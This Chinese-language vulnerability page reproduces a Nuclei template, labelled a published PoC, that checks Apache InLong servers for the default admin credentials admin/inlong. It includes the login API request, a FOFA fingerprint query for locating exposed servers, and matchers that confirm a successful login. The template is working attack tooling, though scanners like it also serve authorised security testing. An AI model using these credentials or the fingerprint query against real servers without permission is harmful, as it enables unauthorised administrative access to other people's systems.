apache-inlong-default-login: Apache InLong - Default Login

日期: 2025-08-01 | 影响软件: Apache InLong | POC: 已公开

漏洞描述

Apache InLong server enables default admin credentials. An attacker can execute unauthorized operations.

PoC代码[已公开]

id: apache-inlong-default-login

info:
  name: Apache InLong - Default Login
  author: icarot
  severity: high
  description: |
    Apache InLong server enables default admin credentials. An attacker can execute unauthorized operations.
  reference:
    - https://github.com/apache/inlong/
  classification:
    cpe: cpe:2.3:a:apache:inlong:1.13.0:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: apache
    product: inlong
    fofa-query: icon_hash="1155196680"
  tags: apache,inlong,default-login,misconfig,vuln

variables:
  username: admin
  password: inlong

http:
  - raw:
      - |
        POST /inlong/manager/api/anno/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"username":"{{username}}","password":"{{password}}"}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"success":true'
          - '"errMsg":null'
          - '"data":true'
        condition: and

      - type: word
        part: content_type
        words:
          - 'application/json'

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100f0db979922b8904ba1bc196b46a6f24f1ac6f03e364dcf12e167c522d56ba0e1022100e180b45c627483dc99e47d883e874d0f0c6fc3d854669e25bf466d67e68541c4:922c64590222798bb761d5b6d8e72950

相关漏洞推荐